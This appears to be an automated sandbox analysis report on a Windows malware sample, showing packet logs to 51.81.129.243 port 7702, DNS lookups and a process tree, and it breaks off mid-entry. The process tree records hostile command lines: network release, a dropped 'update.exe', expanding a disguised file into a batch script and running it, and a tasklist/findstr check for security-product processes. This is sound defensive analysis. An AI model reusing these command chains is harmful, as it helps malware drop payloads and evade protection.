                                                                                                      Mar 3, 2025 13:26:32.901634932 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.901668072 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.901693106 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.901709080 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.901722908 CET499747702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:32.901755095 CET499747702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:32.901771069 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.901813984 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.901839972 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.901855946 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.901855946 CET499747702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:32.901906013 CET499747702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:32.901916027 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.901938915 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.901954889 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.901969910 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.901982069 CET499747702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:32.902004004 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.902019024 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.902025938 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.902034998 CET499747702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:32.902057886 CET499747702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:32.902223110 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.902271986 CET499747702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:32.902312994 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.902328968 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.902365923 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.902375937 CET499747702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:32.902381897 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.902400017 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.902415991 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.902431965 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.902446985 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.902447939 CET499747702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:32.902468920 CET499747702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:32.902497053 CET499747702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:32.902853966 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.902869940 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.989658117 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.989672899 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.989689112 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.989691019 CET499747702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:32.989705086 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.989717007 CET499747702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:32.989722013 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.989737034 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.989752054 CET499747702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:32.989768028 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.989775896 CET499747702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:32.989801884 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.989818096 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.989845037 CET499747702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:32.989851952 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.989887953 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.989897013 CET499747702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:32.989902020 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.989917994 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.989933968 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.989948988 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.989952087 CET499747702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:32.989975929 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.989990950 CET499747702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:32.990008116 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.990024090 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.990026951 CET499747702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:32.990060091 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.990077019 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.990089893 CET499747702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:32.990091085 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.990108013 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.990122080 CET499747702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:32.990122080 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.990139008 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.990148067 CET499747702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:32.990154982 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.990171909 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:32.990185022 CET499747702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:32.990216970 CET499747702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:33.078985929 CET499747702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:33.084471941 CET77024997451.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:33.084549904 CET499747702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:34.145014048 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:34.150125027 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:34.150235891 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:34.168659925 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:34.168845892 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:34.173641920 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:34.173722029 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:34.173979998 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:34.174010038 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:34.174022913 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:34.174035072 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:34.174052000 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:34.174065113 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:34.174077034 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:34.174089909 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:34.174105883 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:34.174129009 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:34.174129963 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:34.174144030 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:34.174160957 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:34.174205065 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:34.178740978 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:34.178800106 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:34.179089069 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:34.179135084 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:34.179160118 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:34.179204941 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:34.179249048 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:34.179261923 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:34.179284096 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:34.179301023 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:34.179368019 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:34.223268032 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:34.223413944 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:34.275222063 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:34.277436972 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:34.327259064 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:34.328418016 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:34.376296043 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:34.376566887 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:34.423243046 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:34.579886913 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.181710005 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.186752081 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.190345049 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.195352077 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.570349932 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.570477009 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.575511932 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.575620890 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.575661898 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.575700045 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.575717926 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.575726032 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.575736046 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.575763941 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.575783014 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.575828075 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.575854063 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.575885057 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.575901031 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.575920105 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.575944901 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.575954914 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.575962067 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.575978994 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.575993061 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.575994015 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.576010942 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.576026917 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.576034069 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.576042891 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.576049089 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.576060057 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.576100111 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.576118946 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.576127052 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.576136112 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.576165915 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.576168060 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.576181889 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.576183081 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.576198101 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.576214075 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.576227903 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.576231956 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.576241016 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.576247931 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.576262951 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.576288939 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.576319933 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.581532001 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.581568003 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.581585884 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.581602097 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.581619024 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.581623077 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.581635952 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.581651926 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.581656933 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.581698895 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.581702948 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.581720114 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.581734896 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.581753969 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.581760883 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.581775904 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.581787109 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.581792116 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.581799984 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.581840038 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.581842899 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.581856966 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.581872940 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.581887007 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.581891060 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.581926107 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.581926107 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.581938982 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.581940889 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.581974030 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.581980944 CET77024997551.81.129.243192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 3, 2025 13:25:52.864008904 CET | 54062 | 53 | 192.168.2.5 | 1.1.1.1
Mar 3, 2025 13:25:52.872930050 CET | 53 | 54062 | 1.1.1.1 | 192.168.2.5
Mar 3, 2025 13:26:33.552191973 CET | 56659 | 53 | 192.168.2.5 | 1.1.1.1
Mar 3, 2025 13:26:33.560467005 CET | 53 | 56659 | 1.1.1.1 | 192.168.2.5

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 3, 2025 13:25:52.864008904 CET | 192.168.2.5 | 1.1.1.1 | 0xe2f | Standard query (0) | kurNPdkiGq.kurNPdkiGq | A (IP address) | IN (0x0001) | false
Mar 3, 2025 13:26:33.552191973 CET | 192.168.2.5 | 1.1.1.1 | 0x64dd | Standard query (0) | 78.210.14.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 3, 2025 13:25:37.144628048 CET | 1.1.1.1 | 192.168.2.5 | 0xa83f | No error (0) | shed.dual-low.s-part-0032.t-0009.t-msedge.net | s-part-0032.t-0009.t-msedge.net |  | CNAME (Canonical name) | IN (0x0001) | false
Mar 3, 2025 13:25:37.144628048 CET | 1.1.1.1 | 192.168.2.5 | 0xa83f | No error (0) | s-part-0032.t-0009.t-msedge.net |  | 13.107.246.60 | A (IP address) | IN (0x0001) | false
Mar 3, 2025 13:25:40.345818996 CET | 1.1.1.1 | 192.168.2.5 | 0x341b | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Mar 3, 2025 13:25:40.345818996 CET | 1.1.1.1 | 192.168.2.5 | 0x341b | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Mar 3, 2025 13:25:52.872930050 CET | 1.1.1.1 | 192.168.2.5 | 0xe2f | Name error (3) | kurNPdkiGq.kurNPdkiGq | none | none | A (IP address) | IN (0x0001) | false
Mar 3, 2025 13:26:33.560467005 CET | 1.1.1.1 | 192.168.2.5 | 0x64dd | Name error (3) | 78.210.14.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Mar 3, 2025 13:26:39.199778080 CET | 1.1.1.1 | 192.168.2.5 | 0x5d09 | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Mar 3, 2025 13:26:39.199778080 CET | 1.1.1.1 | 192.168.2.5 | 0x5d09 | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.210.172 | A (IP address) | IN (0x0001) | false


                                                                                                      Target ID:0
                                                                                                      Start time:07:25:26
                                                                                                      Start date:03/03/2025
                                                                                                      Path:C:\Users\user\Desktop\00000123.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\00000123.exe"
                                                                                                      Imagebase:0xee0000
                                                                                                      File size:3'520'000 bytes
                                                                                                      MD5 hash:20AB8D93805914EE4E7C7953B15928A5
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2569244195.0000000008160000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2533339208.00000000035C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:1
                                                                                                      Start time:07:25:27
                                                                                                      Start date:03/03/2025
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig /release
                                                                                                      Imagebase:0x790000
                                                                                                      File size:236'544 bytes
                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:2
                                                                                                      Start time:07:25:27
                                                                                                      Start date:03/03/2025
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:3
                                                                                                      Start time:07:25:28
                                                                                                      Start date:03/03/2025
                                                                                                      Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:ipconfig /release
                                                                                                      Imagebase:0x250000
                                                                                                      File size:29'184 bytes
                                                                                                      MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true

                                                                                                      Target ID:6
                                                                                                      Start time:07:25:41
                                                                                                      Start date:03/03/2025
                                                                                                      Path:C:\Users\user\AppData\Local\Temp\update.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\update.exe"
                                                                                                      Imagebase:0x400000
                                                                                                      File size:1'506'576 bytes
                                                                                                      MD5 hash:5A69E7FBEB1781A8AB7F77E74CABDB96
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:7
                                                                                                      Start time:07:25:43
                                                                                                      Start date:03/03/2025
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\system32\cmd.exe" /c expand Expensive.pps Expensive.pps.bat & Expensive.pps.bat
                                                                                                      Imagebase:0x790000
                                                                                                      File size:236'544 bytes
                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:8
                                                                                                      Start time:07:25:43
                                                                                                      Start date:03/03/2025
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:9
                                                                                                      Start time:07:25:43
                                                                                                      Start date:03/03/2025
                                                                                                      Path:C:\Windows\SysWOW64\expand.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:expand Expensive.pps Expensive.pps.bat
                                                                                                      Imagebase:0x230000
                                                                                                      File size:53'248 bytes
                                                                                                      MD5 hash:544B0DBFF3F393BCE8BB9D815F532D51
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true

                                                                                                      Target ID:10
                                                                                                      Start time:07:25:44
                                                                                                      Start date:03/03/2025
                                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:tasklist
                                                                                                      Imagebase:0x200000
                                                                                                      File size:79'360 bytes
                                                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:11
                                                                                                      Start time:07:25:44
                                                                                                      Start date:03/03/2025
                                                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:findstr /I "opssvc wrsa"
                                                                                                      Imagebase:0xd70000
                                                                                                      File size:29'696 bytes
                                                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:12
                                                                                                      Start time:07:25:46
                                                                                                      Start date:03/03/2025
                                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                      Wow64 process (32b